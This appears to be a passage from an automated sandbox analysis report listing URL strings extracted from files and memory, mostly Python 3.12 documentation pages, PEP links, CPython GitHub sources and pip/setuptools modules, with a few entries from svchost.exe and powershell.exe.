Source: bytearray.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/bytearray.html
Source: capsule.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/capsule.html
Source: complex.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/complex.html
Source: exceptions.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/exceptions.html
Source: function.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/function.html
Source: gen.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/gen.html
Source: hash.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/hash.html
Source: index.html1.16.drString found in binary or memory: https://docs.python.org/3/c-api/index.html
Source: init_config.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/init_config.html
Source: intro.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/intro.html
Source: list.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/list.html
Source: long.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/long.html
Source: mapping.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/mapping.html
Source: memoryview.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/memoryview.html
Source: method.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/method.html
Source: module.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/module.html
Source: sequence.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/sequence.html
Source: set.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/set.html
Source: stable.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/stable.html
Source: tuple.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/tuple.html
Source: type.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/type.html
Source: typehints.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/typehints.html
Source: typeobj.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/typeobj.html
Source: utilities.html.16.drString found in binary or memory: https://docs.python.org/3/c-api/utilities.html
Source: building.html.16.drString found in binary or memory: https://docs.python.org/3/extending/building.html
Source: newtypes.html.16.drString found in binary or memory: https://docs.python.org/3/extending/newtypes.html
Source: design.html.16.drString found in binary or memory: https://docs.python.org/3/faq/design.html
Source: library.html.16.drString found in binary or memory: https://docs.python.org/3/faq/library.html
Source: genindex-E.html.16.drString found in binary or memory: https://docs.python.org/3/genindex-E.html
Source: genindex-N.html.16.drString found in binary or memory: https://docs.python.org/3/genindex-N.html
Source: genindex-R.html.16.drString found in binary or memory: https://docs.python.org/3/genindex-R.html
Source: genindex-S.html.16.drString found in binary or memory: https://docs.python.org/3/genindex-S.html
Source: genindex-Y.html.16.drString found in binary or memory: https://docs.python.org/3/genindex-Y.html
Source: genindex.html.16.drString found in binary or memory: https://docs.python.org/3/genindex.html
Source: glossary.html.16.drString found in binary or memory: https://docs.python.org/3/glossary.html
Source: argparse.html.16.drString found in binary or memory: https://docs.python.org/3/howto/argparse.html
Source: index.html7.16.drString found in binary or memory: https://docs.python.org/3/howto/index.html
Source: instrumentation.html.16.drString found in binary or memory: https://docs.python.org/3/howto/instrumentation.html
Source: isolating-extensions.html.16.drString found in binary or memory: https://docs.python.org/3/howto/isolating-extensions.html
Source: scheme.cpython-312.pyc.16.drString found in binary or memory: https://docs.python.org/3/install/index.html#alternate-installation.
Source: run.py.16.dr, pyshell.py.16.drString found in binary or memory: https://docs.python.org/3/library/idle.html#startup-failure
Source: core.cpython-312.pyc.16.drString found in binary or memory: https://docs.python.org/3/library/re.html
Source: core.cpython-312.pyc.16.drString found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: tkinter.colorchooser.html.16.drString found in binary or memory: https://docs.python.org/3/library/tkinter.colorchooser.html
Source: tkinter.ttk.html.16.drString found in binary or memory: https://docs.python.org/3/library/tkinter.ttk.html
Source: tokenize.html.16.drString found in binary or memory: https://docs.python.org/3/library/tokenize.html
Source: trace.html.16.drString found in binary or memory: https://docs.python.org/3/library/trace.html
Source: tty.html.16.drString found in binary or memory: https://docs.python.org/3/library/tty.html
Source: unittest.mock.html.16.drString found in binary or memory: https://docs.python.org/3/library/unittest.mock.html
Source: uuid.html.16.drString found in binary or memory: https://docs.python.org/3/library/uuid.html
Source: warnings.html.16.drString found in binary or memory: https://docs.python.org/3/library/warnings.html
Source: wave.html.16.drString found in binary or memory: https://docs.python.org/3/library/wave.html
Source: weakref.html.16.drString found in binary or memory: https://docs.python.org/3/library/weakref.html
Source: windows.html.16.drString found in binary or memory: https://docs.python.org/3/library/windows.html
Source: winreg.html.16.drString found in binary or memory: https://docs.python.org/3/library/winreg.html
Source: winsound.html.16.drString found in binary or memory: https://docs.python.org/3/library/winsound.html
Source: xml.sax.utils.html.16.drString found in binary or memory: https://docs.python.org/3/library/xml.sax.utils.html
Source: xmlrpc.server.html.16.drString found in binary or memory: https://docs.python.org/3/library/xmlrpc.server.html
Source: zipapp.html.16.drString found in binary or memory: https://docs.python.org/3/library/zipapp.html
Source: zipfile.html.16.drString found in binary or memory: https://docs.python.org/3/library/zipfile.html
Source: zlib.html.16.drString found in binary or memory: https://docs.python.org/3/library/zlib.html
Source: expressions.html.16.drString found in binary or memory: https://docs.python.org/3/reference/expressions.html
Source: classes.html.16.drString found in binary or memory: https://docs.python.org/3/tutorial/classes.html
Source: errors.html.16.drString found in binary or memory: https://docs.python.org/3/tutorial/errors.html
Source: interactive.html.16.drString found in binary or memory: https://docs.python.org/3/tutorial/interactive.html
Source: introduction.html0.16.drString found in binary or memory: https://docs.python.org/3/tutorial/introduction.html
Source: editors.html.16.drString found in binary or memory: https://docs.python.org/3/using/editors.html
Source: mac.html.16.drString found in binary or memory: https://docs.python.org/3/using/mac.html
Source: 2.2.html.16.drString found in binary or memory: https://docs.python.org/3/whatsnew/2.2.html
Source: 2.3.html.16.drString found in binary or memory: https://docs.python.org/3/whatsnew/2.3.html
Source: 3.1.html.16.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.1.html
Source: 3.2.html.16.drString found in binary or memory: https://docs.python.org/3/whatsnew/3.2.html
Source: library.html.16.drString found in binary or memory: https://epydoc.sourceforge.net/
Source: unix.cpython-312.pyc.16.drString found in binary or memory: https://freedesktop.org/wiki/Software/xdg-user-dirs/.z
Source: svchost.exe, 00000007.00000003.1471535168.000001FB4B6A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1471535168.000001FB4B670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: sslproto.py.16.drString found in binary or memory: https://git.io/fj59P):
Source: sslproto.py.16.drString found in binary or memory: https://github.com/MagicStack/uvloop/tree/v0.16.0
Source: powershell.exe, 00000005.00000002.2036650641.0000028A016F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: __init__.py28.16.drString found in binary or memory: https://github.com/kennethreitz/requests/pull/2567.
Source: __init__.py0.16.drString found in binary or memory: https://github.com/platformdirs/platformdirs
Source: cache.py.16.dr, cache.cpython-312.pyc.16.drString found in binary or memory: https://github.com/psf/cachecontrol/issues/324).
Source: deprecation.py.16.drString found in binary or memory: https://github.com/pypa/pip/issues/
Source: installation_report.py.16.drString found in binary or memory: https://github.com/pypa/pip/issues/11198
Source: wheel.py.16.drString found in binary or memory: https://github.com/pypa/pip/issues/1150)
Source: prepare.py.16.drString found in binary or memory: https://github.com/pypa/pip/issues/11943
Source: newtypes.html.16.drString found in binary or memory: https://github.com/python/cpython
Source: 3.2.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/076ca6c3c8df3030307e548d9be792ce3c1c6eea/Misc/NEWS
Source: apiabiversion.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/apiabiversion.rst
Source: bytearray.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/bytearray.rst
Source: capsule.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/capsule.rst
Source: complex.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/complex.rst
Source: exceptions.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/exceptions.rst
Source: function.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/function.rst
Source: gen.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/gen.rst
Source: hash.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/hash.rst
Source: index.html1.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/index.rst
Source: init_config.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/init_config.rst
Source: intro.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/intro.rst
Source: list.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/list.rst
Source: long.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/long.rst
Source: mapping.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/mapping.rst
Source: memoryview.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/memoryview.rst
Source: method.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/method.rst
Source: module.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/module.rst
Source: sequence.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/sequence.rst
Source: set.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/set.rst
Source: stable.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/stable.rst
Source: tuple.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/tuple.rst
Source: type.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/type.rst
Source: typehints.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typehints.rst
Source: typeobj.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/typeobj.rst
Source: utilities.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/c-api/utilities.rst
Source: building.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/extending/building.rst
Source: newtypes.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/extending/newtypes.rst
Source: design.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/faq/design.rst
Source: library.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/faq/library.rst
Source: glossary.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/glossary.rst
Source: argparse.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/argparse.rst
Source: index.html7.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/index.rst
Source: instrumentation.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/instrumentation.rst
Source: isolating-extensions.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/howto/isolating-extensions.rst
Source: tkinter.colorchooser.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.colorchooser.rst
Source: tkinter.ttk.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tkinter.ttk.rst
Source: tokenize.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tokenize.rst
Source: trace.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/trace.rst
Source: tty.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/tty.rst
Source: unittest.mock.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/unittest.mock.rst
Source: uuid.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/uuid.rst
Source: warnings.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/warnings.rst
Source: wave.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/wave.rst
Source: weakref.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/weakref.rst
Source: windows.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/windows.rst
Source: winreg.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/winreg.rst
Source: winsound.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/winsound.rst
Source: xml.sax.utils.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xml.sax.utils.rst
Source: xmlrpc.server.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/xmlrpc.server.rst
Source: zipapp.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/zipapp.rst
Source: zipfile.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/zipfile.rst
Source: zlib.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/library/zlib.rst
Source: expressions.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/reference/expressions.rst
Source: classes.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/classes.rst
Source: errors.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/errors.rst
Source: interactive.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/interactive.rst
Source: introduction.html0.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/tutorial/introduction.rst
Source: editors.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/editors.rst
Source: mac.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/using/mac.rst
Source: 2.2.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.2.rst
Source: 2.3.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/2.3.rst
Source: 3.1.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.1.rst
Source: 3.2.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/main/Doc/whatsnew/3.2.rst
Source: isolating-extensions.html.16.drString found in binary or memory: https://github.com/python/cpython/blob/master/Modules/xxlimited.c
Source: typing.cpython-312.pyc.16.drString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: apiabiversion.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Include/patchlevel.h
Source: expressions.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/asyncio/base_events.py
Source: tkinter.colorchooser.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/colorchooser.py
Source: tkinter.ttk.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tkinter/ttk.py
Source: tokenize.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tokenize.py
Source: trace.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/trace.py
Source: tty.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/tty.py
Source: unittest.mock.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/unittest/mock.py
Source: uuid.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/uuid.py
Source: warnings.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/warnings.py
Source: wave.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/wave.py
Source: weakref.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/weakref.py
Source: xml.sax.utils.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xml/sax/saxutils.py
Source: xmlrpc.server.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/xmlrpc/server.py
Source: zipapp.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/zipapp.py
Source: zipfile.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Lib/zipfile/
Source: library.html.16.drString found in binary or memory: https://github.com/python/cpython/tree/3.12/Modules
Source: dataclasses.py.16.drString found in binary or memory: https://github.com/python/typing/issues/508
Source: design.html.16.drString found in binary or memory: https://github.com/stackless-dev/stackless/wiki
Source: sidebar.py.16.drString found in binary or memory: https://github.com/tcltk/tk/blob/064ff9941b4b80b85916a8afe86a6c21fd388b54/library/text.tcl#L670
Source: 3.2.html.16.drString found in binary or memory: https://greenteapress.com/semaphores/LittleBookOfSemaphores.pdf
Source: library.html.16.drString found in binary or memory: https://groups.google.com/groups?selm=34A04430.CF9&#64;ohioee.com
Source: glossary.html.16.drString found in binary or memory: https://gvanrossum.github.io/
Source: 2.3.html.16.drString found in binary or memory: https://hg.python.org/cpython/file/default/Objects/obmalloc.c
Source: api.cpython-312.pyc0.16.drString found in binary or memory: https://httpbin.org/get
Source: 2.3.html.16.drString found in binary or memory: https://idlefork.sourceforge.net
Source: zipfile.html.16.drString found in binary or memory: https://infozip.sourceforge.net/
Source: interactive.html.16.drString found in binary or memory: https://ipython.org/
Source: decoder.cpython-312.pyc.16.drString found in binary or memory: https://json.org
Source: 3.1.html.16.drString found in binary or memory: https://json.org/
Source: mac.html.16.drString found in binary or memory: https://kivy.org
Source: mac.html.16.drString found in binary or memory: https://macromates.com
Source: mac.html.16.drString found in binary or memory: https://macvim.org
Source: isolating-extensions.html.16.drString found in binary or memory: https://mail.python.org/mailman3/lists/capi-sig.python.org/
Source: design.html.16.drString found in binary or memory: https://mail.python.org/pipermail/python-3000/2006-November/004643.html
Source: 2.3.html.16.drString found in binary or memory: https://mail.python.org/pipermail/python-dev/2002-December/031107.html
Source: 2.3.html.16.drString found in binary or memory: https://mail.python.org/pipermail/python-dev/2002-October/029035.html
Source: design.html.16.drString found in binary or memory: https://mail.python.org/pipermail/python-ideas/2016-May/040070.html
Source: powershell.exe, 00000005.00000002.2078895850.0000028A11544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2078895850.0000028A11687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 3.2.html.16.drString found in binary or memory: https://osl.cs.illinois.edu/media/papers/karmani-2009-barrier_synchronization_pattern.pdf
Source: mac.html.16.drString found in binary or memory: https://packaging.python.org/en/latest/tutorials/installing-packages/
Source: __init__.py11.16.drString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0001/
Source: intro.html.16.drString found in binary or memory: https://peps.python.org/pep-0007/
Source: editors.html.16.dr, expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0008/
Source: weakref.html.16.drString found in binary or memory: https://peps.python.org/pep-0205/
Source: 2.3.html.16.dr, 2.4.html.16.drString found in binary or memory: https://peps.python.org/pep-0218/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0227/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0234/
Source: 2.2.html.16.dr, 2.4.html.16.drString found in binary or memory: https://peps.python.org/pep-0237/
Source: 2.2.html.16.dr, glossary.html.16.dr, veryhigh.html.16.drString found in binary or memory: https://peps.python.org/pep-0238/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0252/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0253/
Source: 2.2.html.16.dr, expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0255/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0261/
Source: tokenize.html.16.drString found in binary or memory: https://peps.python.org/pep-0263/
Source: 2.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0264/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0273/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0277/
Source: 2.3.html.16.dr, glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0278/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0279/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0282/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0285/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0293/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0301/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0302/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0305/
Source: 2.3.html.16.drString found in binary or memory: https://peps.python.org/pep-0307/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0308/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0342/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0343/
Source: intro.html.16.drString found in binary or memory: https://peps.python.org/pep-0353/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0362/
Source: 3.1.html.16.drString found in binary or memory: https://peps.python.org/pep-0372/
Source: installation_report.py.16.drString found in binary or memory: https://peps.python.org/pep-0376/#requested
Source: 3.1.html.16.drString found in binary or memory: https://peps.python.org/pep-0378/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0380/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0384/
Source: stable.html.16.drString found in binary or memory: https://peps.python.org/pep-0387/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0389/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0391/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-0392/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0411/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0420/
Source: init_config.html.16.drString found in binary or memory: https://peps.python.org/pep-0432/
Source: typeobj.html.16.dr, newtypes.html.16.drString found in binary or memory: https://peps.python.org/pep-0442/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0443/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0448/
Source: module.html.16.dr, glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0451/
Source: hash.html.16.drString found in binary or memory: https://peps.python.org/pep-0456/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0483/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0484/
Source: dataclasses.py.16.drString found in binary or memory: https://peps.python.org/pep-0487/#implementation-details.
Source: module.html.16.dr, building.html.16.drString found in binary or memory: https://peps.python.org/pep-0489/
Source: glossary.html.16.dr, expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0492/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0498/
Source: constructors.py.16.drString found in binary or memory: https://peps.python.org/pep-0508/#complete-grammar
Source: installation_report.py.16.drString found in binary or memory: https://peps.python.org/pep-0508/#environment-markers
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0519/
Source: glossary.html.16.dr, expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0525/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0526/
Source: init_config.html.16.drString found in binary or memory: https://peps.python.org/pep-0528/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0530/
Source: init_config.html.16.dr, cmdline.html.16.drString found in binary or memory: https://peps.python.org/pep-0538/
Source: init_config.html.16.drString found in binary or memory: https://peps.python.org/pep-0540/
Source: init_config.html.16.drString found in binary or memory: https://peps.python.org/pep-0552/
Source: expressions.html.16.drString found in binary or memory: https://peps.python.org/pep-0572/
Source: weakref.html.16.drString found in binary or memory: https://peps.python.org/pep-0584/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-0585/
Source: init_config.html.16.drString found in binary or memory: https://peps.python.org/pep-0587/
Source: typeobj.html.16.drString found in binary or memory: https://peps.python.org/pep-0634/
Source: 3.1.html.16.dr, glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-3116/
Source: module.html.16.drString found in binary or memory: https://peps.python.org/pep-3121/
Source: 3.2.html.16.dr, modules.html.16.drString found in binary or memory: https://peps.python.org/pep-3147/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-3148/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-3149/
Source: exceptions.html.16.drString found in binary or memory: https://peps.python.org/pep-3151/
Source: glossary.html.16.drString found in binary or memory: https://peps.python.org/pep-3155/
Source: 3.2.html.16.drString found in binary or memory: https://peps.python.org/pep-3333/
Source: zipfile.html.16.drString found in binary or memory: https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT
Source: 2.3.html.16.drString found in binary or memory: https://pybsddb.sourceforge.net
Source: mac.html.16.drString found in binary or memory: https://pyinstaller.org/
Source: 2.3.html.16.drString found in binary or memory: https://pypi.org
Source: unittest.mock.html.16.drString found in binary or memory: https://pypi.org/project/mock
Source: mac.html.16.drString found in binary or memory: https://pypi.org/project/py2app/
Source: mac.html.16.drString found in binary or memory: https://pypi.org/project/pyobjc/
Source: library.html.16.drString found in binary or memory: https://pypi.org/project/pyserial/
Source: zipfile.html.16.drString found in binary or memory: https://pypi.org/project/zipp
Source: 3.1.html.16.drString found in binary or memory: https://pyyaml.org/
Source: mac.html.16.drString found in binary or memory: https://qt.io
Source: mac.html.16.drString found in binary or memory: https://riverbankcomputing.com/software/pyqt/intro
Source: __init__.py.16.dr, __init__.cpython-312.pyc.16.drString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
Source: __init__.py.16.dr, __init__.cpython-312.pyc.16.drString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
Source: __init__.py.16.drString found in binary or memory: https://setuptools.pypa.io/en/latest/references/
Source: building.html.16.drString found in binary or memory: https://setuptools.readthedocs.io/en/latest/setuptools.html
Source: unix.cpython-312.pyc.16.drString found in binary or memory: https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html
Source: core.cpython-312.pyc.16.drString found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: interactive.html.16.drString found in binary or memory: https://tiswww.case.edu/php/chet/readline/rltop.html
Source: tkinter.ttk.html.16.drString found in binary or memory: https://tktable.sourceforge.net/tile/doc/converting.txt
Source: tkinter.ttk.html.16.drString found in binary or memory: https://tktable.sourceforge.net/tile/tile-tcl2004.pdf
Source: mac.html.16.drString found in binary or memory: https://toga.readthedocs.io
Source: library.html.16.drString found in binary or memory: https://twisted.org/
Source: unittest.mock.html.16.drString found in binary or memory: https://web.archive.org/web/20200603181648/http://www.voidspace.org.uk/python/weblog/arch_d7_2010_12
Source: 3.2.html.16.drString found in binary or memory: https://web.archive.org/web/20200703234532/http://effbot.org/zone/elementtree-13-intro.htm
Source: library.html.16.drString found in binary or memory: https://web.archive.org/web/20210224183619/http://phaseit.net/claird/comp.lang.python/web_python
Source: library.html.16.drString found in binary or memory: https://wiki.python.org/moin/DatabaseProgramming
Source: 3.2.html.16.drString found in binary or memory: https://wiki.python.org/moin/HowTo/Sorting/
Source: editors.html.16.drString found in binary or memory: https://wiki.python.org/moin/IntegratedDevelopmentEnvironments
Source: mac.html.16.drString found in binary or memory: https://wiki.python.org/moin/MacPython
Source: editors.html.16.drString found in binary or memory: https://wiki.python.org/moin/PythonEditors
Source: library.html.16.drString found in binary or memory: https://wiki.python.org/moin/WebProgramming
Source: mac.html.16.drString found in binary or memory: https://www.activestate.com
Source: ReaderMessages.3.drString found in binary or memory: https://www.adobe.co
Source: mac.html.16.drString found in binary or memory: https://www.barebones.com/products/bbedit/index.html
Source: library.html.16.drString found in binary or memory: https://www.google.com
Source: mac.html.16.drString found in binary or memory: https://www.hashcollision.org/hkn/python/idle_intro/index.html
Source: _aix_support.py.16.drString found in binary or memory: https://www.ibm.com/
Source: design.html.16.drString found in binary or memory: https://www.jython.org
Source: design.html.16.drString found in binary or memory: https://www.nuitka.net/
Source: design.html.16.drString found in binary or memory: https://www.pypy.org
Source: glossary.html.16.drString found in binary or memory: https://www.python.org
Source: 3.2.html.16.dr, annotations.html.16.dr, modules.html.16.dr, float.html.16.dr, contextvars.html.16.dr, veryhigh.html.16.dr, telnetlib.html.16.dr, genindex-L.html.16.dr, 2.4.html.16.dr, code.html.16.dr, cmdline.html.16.dr, genindex-Q.html.16.dr, perfmaps.html.16.dr, index.html4.16.dr, stdlib2.html.16.drString found in binary or memory: https://www.python.org/
Source: mac.html.16.drString found in binary or memory: https://www.python.org/community/sigs/current/pythonmac-sig/
Source: installation_report.py.16.drString found in binary or memory: https://www.python.org/dev/peps/pep-0566/#json-compatible-metadata
Source: classes.html.16.dr, glossary.html.16.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/
Source: mac.html.16.drString found in binary or memory: https://www.python.org/downloads/macos/
Source: newtypes.html.16.drString found in binary or memory: https://www.python.org/downloads/source/
Source: type.html.16.dr, stable.html.16.dr, tty.html.16.dr, zipfile.html.16.dr, index.html7.16.dr, capsule.html.16.dr, xml.sax.utils.html.16.dr, isolating-extensions.html.16.dr, editors.html.16.dr, unittest.mock.html.16.dr, list.html.16.dr, errors.html.16.dr, genindex-S.html.16.dr, set.html.16.dr, long.html.16.dr, xmlrpc.server.html.16.dr, zipapp.html.16.dr, exceptions.html.16.dr, wave.html.16.dr, apiabiversion.html.16.dr, library.html.16.drString found in binary or memory: https://www.python.org/psf/donations/
Source: mac.html.16.drString found in binary or memory: https://www.qt.io/qt-for-python
Source: library.html.16.drString found in binary or memory: https://www.sphinx-doc.org
